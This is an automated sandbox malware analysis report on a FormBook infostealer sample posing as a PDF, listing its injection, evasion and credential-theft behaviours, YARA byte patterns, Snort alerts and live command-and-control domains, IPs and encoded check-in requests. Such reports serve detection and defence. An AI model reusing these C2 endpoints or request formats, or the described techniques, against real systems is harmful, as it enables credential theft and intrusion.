Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TTCopy-240323-PDF.exe

Overview

General Information

Sample Name:TTCopy-240323-PDF.exe
Analysis ID:837869
MD5:348e51874930db41b232a0bab0a4c040
SHA1:acac6fe84007d3d4fe18b38ed48e2892969aade0
SHA256:7b8a4cea9f76cf8dec6243f6103244578618081c05cb9927a9b7f619c32d956c
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Connects to several IPs in different countries
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • TTCopy-240323-PDF.exe (PID: 6440 cmdline: C:\Users\user\Desktop\TTCopy-240323-PDF.exe MD5: 348E51874930DB41B232A0BAB0A4C040)
    • gkvlc.exe (PID: 5268 cmdline: "C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi MD5: ED08DE264DF3804BADFB2EF7CC487893)
      • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • gkvlc.exe (PID: 4064 cmdline: C:\Users\user\AppData\Local\Temp\gkvlc.exe MD5: ED08DE264DF3804BADFB2EF7CC487893)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • rundll32.exe (PID: 5264 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f090:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1832f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de37:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.775538057.0000000000980000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.775538057.0000000000980000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f090:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.gkvlc.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.gkvlc.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x200e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1930a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.gkvlc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19108:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18ba4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1920a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19382:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xba5d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17dff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1ee8a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fe3d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.gkvlc.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.gkvlc.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20ee3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a10a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.6145.239.252.4949710802031453 03/30/23-10:23:54.354365
          SID:2031453
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.685.187.128.3449734802031412 03/30/23-10:25:22.472262
          SID:2031412
          Source Port:49734
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6194.58.112.17449743802031449 03/30/23-10:26:03.804330
          SID:2031449
          Source Port:49743
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6145.239.252.4949756802031449 03/30/23-10:26:54.408302
          SID:2031449
          Source Port:49756
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.685.187.128.3449734802031449 03/30/23-10:25:22.472262
          SID:2031449
          Source Port:49734
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6194.58.112.17449743802031412 03/30/23-10:26:03.804330
          SID:2031412
          Source Port:49743
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6145.239.252.4949756802031412 03/30/23-10:26:54.408302
          SID:2031412
          Source Port:49756
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6145.239.252.4949710802031449 03/30/23-10:23:54.354365
          SID:2031449
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6145.239.252.4949756802031453 03/30/23-10:26:54.408302
          SID:2031453
          Source Port:49756
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6145.239.252.4949710802031412 03/30/23-10:23:54.354365
          SID:2031412
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6194.58.112.17449743802031453 03/30/23-10:26:03.804330
          SID:2031453
          Source Port:49743
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.685.187.128.3449734802031453 03/30/23-10:25:22.472262
          SID:2031453
          Source Port:49734
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: TTCopy-240323-PDF.exeReversingLabs: Detection: 70%
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.gkvlc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.gkvlc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.775538057.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.307010756.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.775075020.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.306629173.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.laksiricargo.com/qsni/?C6=6t2Q7SeAwLmQNelBXDLKo9qpSU1icepMxITYi6227y8BkUMVt16o9uBaj3iomGvWgYEbJgVfO4tURjyhVEwFkTJljUaU+RSQoO9JU52yJaZ7&ZOm=dXna0dAvira URL Cloud: Label: malware
          Source: http://www.smirnovmir.online/qsni/Avira URL Cloud: Label: malware
          Source: http://www.coolconnect.online/qsni/Avira URL Cloud: Label: malware
          Source: http://www.studioweiden.click/qsni/?ZOm=dXna0d&C6=26sVYQdWyPHrLcN8MdbUKtu6rE5mK0DGN1OetThfHCln6c5Rbo6sl7lf7GeT2I5yOzNBygfgGXS7QAdgzJGeV3dtWL+OEoULXVdsrh2vXHGaAvira URL Cloud: Label: malware
          Source: http://www.lozpw.space/qsni/?C6=7+/pa7cMIZb54wjm1RsZvtFfNVB8Z/QdqaMN0Z3PMdssi3LToC7r01OcckC1KOCTsbG7Wxv/cdrmK2w8C8oi13hsN9vphDqPYEofN51tqDkO&ZOm=dXna0dAvira URL Cloud: Label: malware
          Source: http://www.paystiky.site/qsni/Avira URL Cloud: Label: malware
          Source: http://www.no-leaks.com/qsni/?ZOm=dXna0d&C6=20xhMWbp2rhGgEBmOnN/yuEbcH426mhGgRtw9KpGIAL9OE+0hkYwLlKlZ9z7J35lfOa8jhk9Snj95+wj7juHJ9vXTEnViFsBbwnkbfnQvm3PAvira URL Cloud: Label: malware
          Source: http://thedivinerudraksha.com/qsni/?C6=S6oNdn2CISfbyQQSFOkbdML8TX/gNb7zOhc0ncpUr4ThSa27AwSs7NRYXuu6rAvira URL Cloud: Label: malware
          Source: http://www.solscape.org/qsni/Avira URL Cloud: Label: malware
          Source: http://www.dammar.net/qsni/Avira URL Cloud: Label: malware
          Source: http://www.thedivinerudraksha.com/qsni/?C6=S6oNdn2CISfbyQQSFOkbdML8TX/gNb7zOhc0ncpUr4ThSa27AwSs7NRYXuu6rvDZZ5M5qPLQzIJSvpL/eoGGUOPSfzmcqKmyyuwcLPwrUmgH&ZOm=dXna0dAvira URL Cloud: Label: malware
          Source: http://www.pgatraining.com/qsni/Avira URL Cloud: Label: malware
          Source: http://www.pgatraining.com/qsni/?C6=ylLLAvira URL Cloud: Label: malware
          Source: http://www.no-leaks.com/qsni/Avira URL Cloud: Label: malware
          Source: http://www.smirnovmir.online/qsni/?ZOm=dXna0d&C6=FgfvfbKMco1hm4BTaSRmeVKlkqqq28/f/j0nkdrPBpFMczuiiIeBX6QaoIVtcG6Y6TumCsRXLbRUzhWAbp/pDAVUj4gCTuO332taxWtVavyGAvira URL Cloud: Label: malware
          Source: http://www.dammar.net/qsni/?C6=/CUbeLGdGW7zl6Yrg3szV70J26SXMoQ2pfYL+bcx2mg0PIzThOL5knKcXzWm1tDlAVZWmNl686ZiGeZ8WLzQG28uiNuGoArcmZEyTk8QSRXO&ZOm=dXna0dAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeReversingLabs: Detection: 75%
          Machine Learning detection for sample
          Source: TTCopy-240323-PDF.exeJoe Sandbox ML: detected
          Source: 3.2.gkvlc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.gkvlc.exe.710000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: TTCopy-240323-PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: TTCopy-240323-PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: gkvlc.exe, 00000001.00000003.259319301.000000001A320000.00000004.00001000.00020000.00000000.sdmp, gkvlc.exe, 00000001.00000003.256867850.000000001A190000.00000004.00001000.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000003.262507721.0000000000709000.00000004.00000020.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000002.307286924.0000000000B6F000.00000040.00001000.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000003.264860524.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.306596206.000000000449C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.777446880.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.777446880.00000000048EF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.308845671.0000000004633000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: gkvlc.exe, gkvlc.exe, 00000003.00000003.262507721.0000000000709000.00000004.00000020.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000002.307286924.0000000000B6F000.00000040.00001000.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000003.264860524.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.306596206.000000000449C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.777446880.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.777446880.00000000048EF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.308845671.0000000004633000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: gkvlc.exe, 00000003.00000002.310205098.0000000002640000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: gkvlc.exe, 00000003.00000002.310205098.0000000002640000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_004073C1 FindFirstFileExW,1_2_004073C1

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.150 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 85.187.128.34 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.smirnovmir.online
          Source: C:\Windows\explorer.exeDomain query: www.thedivinerudraksha.com
          Source: C:\Windows\explorer.exeNetwork Connect: 69.172.75.142 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.81 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.eylien.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.231.66.204 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.pgatraining.com
          Source: C:\Windows\explorer.exeDomain query: www.solscape.org
          Source: C:\Windows\explorer.exeNetwork Connect: 145.239.252.49 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.paystiky.site
          Source: C:\Windows\explorer.exeDomain query: www.laksiricargo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.66 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.32.200.254 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.dammar.net
          Source: C:\Windows\explorer.exeDomain query: www.wellblech.shop
          Source: C:\Windows\explorer.exeNetwork Connect: 45.136.196.215 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.no-leaks.com
          Source: C:\Windows\explorer.exeDomain query: www.deconsurveys.com
          Source: C:\Windows\explorer.exeDomain query: www.goosedigitals.com
          Source: C:\Windows\explorer.exeNetwork Connect: 173.199.124.126 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 156.226.207.81 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.30.147 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.studioweiden.click
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lozpw.space
          Source: C:\Windows\explorer.exeDomain query: www.coolconnect.online
          Source: C:\Windows\explorer.exeNetwork Connect: 185.134.245.113 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.58.112.174 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.hexiemoju.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49710 -> 145.239.252.49:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49710 -> 145.239.252.49:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49710 -> 145.239.252.49:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49734 -> 85.187.128.34:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49734 -> 85.187.128.34:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49734 -> 85.187.128.34:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49743 -> 194.58.112.174:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49743 -> 194.58.112.174:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49743 -> 194.58.112.174:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 145.239.252.49:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 145.239.252.49:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 145.239.252.49:80
          Source: Joe Sandbox ViewASN Name: PLI-ASCH PLI-ASCH
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=26sVYQdWyPHrLcN8MdbUKtu6rE5mK0DGN1OetThfHCln6c5Rbo6sl7lf7GeT2I5yOzNBygfgGXS7QAdgzJGeV3dtWL+OEoULXVdsrh2vXHGa HTTP/1.1Host: www.studioweiden.clickConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=sjDLJDaVFikbBLWeMZWSwu5CnHyJDqPqbcjbdnlFjtv6c2l5GqNUNqEWLibW6hm2WPlpLlzvFm1TmHWnlQdAoValOlOqTFFHZz0t1yDYUjQx&ZOm=dXna0d HTTP/1.1Host: www.deconsurveys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=ylLL+a8J/3JJvCdIraNgF6BSXSl8NPtUrBXqEYbPGkQO18qlBvsQ7giWAZIzNvf1UZKYMEb3cvhxf0GhUtqt7EXDK++t1UbmIuhNRAnUxFPd HTTP/1.1Host: www.pgatraining.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=/CUbeLGdGW7zl6Yrg3szV70J26SXMoQ2pfYL+bcx2mg0PIzThOL5knKcXzWm1tDlAVZWmNl686ZiGeZ8WLzQG28uiNuGoArcmZEyTk8QSRXO&ZOm=dXna0d HTTP/1.1Host: www.dammar.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=20xhMWbp2rhGgEBmOnN/yuEbcH426mhGgRtw9KpGIAL9OE+0hkYwLlKlZ9z7J35lfOa8jhk9Snj95+wj7juHJ9vXTEnViFsBbwnkbfnQvm3P HTTP/1.1Host: www.no-leaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=7+/pa7cMIZb54wjm1RsZvtFfNVB8Z/QdqaMN0Z3PMdssi3LToC7r01OcckC1KOCTsbG7Wxv/cdrmK2w8C8oi13hsN9vphDqPYEofN51tqDkO&ZOm=dXna0d HTTP/1.1Host: www.lozpw.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=2dXT+4Ai7ZbPKYl8drSkrCy2lxkaNy55YxFVHbvYyUio5rd6lf6SLF0ob3hHEU1U1UadvRiDLVbZ/zXRgBVvecK7bXV6D842o39gH3q8FOBk HTTP/1.1Host: www.paystiky.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=EdJnJU/lhOYEhE9BO9NphGlO3QLRR4S2ZfetV970kfyK3r0VSOQZIVbRZ1Rh/wTR4QMpun6FHmi+ja6D1wHWvgz/qr6+Lt4m8nQxrZSCvu65&ZOm=dXna0d HTTP/1.1Host: www.coolconnect.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=7H8xSIW5MLqIY53/LGllmkoRmNfLQ4PxXJLF+jC+GuEFiwPgygLyspGMipLnk+o+jVAb/2fizt6b+gypwGaXqyig7aE98woG1OMKQE7sGn5L HTTP/1.1Host: www.solscape.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=S6oNdn2CISfbyQQSFOkbdML8TX/gNb7zOhc0ncpUr4ThSa27AwSs7NRYXuu6rvDZZ5M5qPLQzIJSvpL/eoGGUOPSfzmcqKmyyuwcLPwrUmgH&ZOm=dXna0d HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=xN2Ykcx+dVxWXpEVy0UIOF/PMPW6GcpN8TjIanJ5/1roRjTsXtyK1vSqyqsFx56l6NugQvTefoOMKvMnzU7TqfIAwz99vX70dq+IkxJCDx9y HTTP/1.1Host: www.wellblech.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=6t2Q7SeAwLmQNelBXDLKo9qpSU1icepMxITYi6227y8BkUMVt16o9uBaj3iomGvWgYEbJgVfO4tURjyhVEwFkTJljUaU+RSQoO9JU52yJaZ7&ZOm=dXna0d HTTP/1.1Host: www.laksiricargo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=FgfvfbKMco1hm4BTaSRmeVKlkqqq28/f/j0nkdrPBpFMczuiiIeBX6QaoIVtcG6Y6TumCsRXLbRUzhWAbp/pDAVUj4gCTuO332taxWtVavyG HTTP/1.1Host: www.smirnovmir.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=QfEH2LlQJkhao1qhydFpLuO03+YyqoCU3gb+yzoLlx0bdVzB1Ri3UMkYiWEqIQkbZVoV1sjk8Mu+D1IodnZSi5GE+4Z2R1bARZG0EKwNnHKl&ZOm=dXna0d HTTP/1.1Host: www.eylien.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=oPyrfRlE7jGprydIcpn1uLxu0uVPdhQD6EOIZ3ubbXdpkE4rDM9lUBPa/Wg1MhL6NFOsyrI8+tVoLFRpvfeXwUES31gxAIydNpG03eX3gAqa HTTP/1.1Host: www.goosedigitals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=p8pgVrFU0KaM67LkG2/HXLDeB7IL2n51le4JMrfTj7FohhyzYrH8fXmJIvaeotiFFl2VJ/RpY5m/lS8/GyXuRg8EnyJC/Fp8bjDJ/ib+v4lR&ZOm=dXna0d HTTP/1.1Host: www.hexiemoju.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=26sVYQdWyPHrLcN8MdbUKtu6rE5mK0DGN1OetThfHCln6c5Rbo6sl7lf7GeT2I5yOzNBygfgGXS7QAdgzJGeV3dtWL+OEoULXVdsrh2vXHGa HTTP/1.1Host: www.studioweiden.clickConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=sjDLJDaVFikbBLWeMZWSwu5CnHyJDqPqbcjbdnlFjtv6c2l5GqNUNqEWLibW6hm2WPlpLlzvFm1TmHWnlQdAoValOlOqTFFHZz0t1yDYUjQx&ZOm=dXna0d HTTP/1.1Host: www.deconsurveys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=ylLL+a8J/3JJvCdIraNgF6BSXSl8NPtUrBXqEYbPGkQO18qlBvsQ7giWAZIzNvf1UZKYMEb3cvhxf0GhUtqt7EXDK++t1UbmIuhNRAnUxFPd HTTP/1.1Host: www.pgatraining.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 81.17.29.150 81.17.29.150
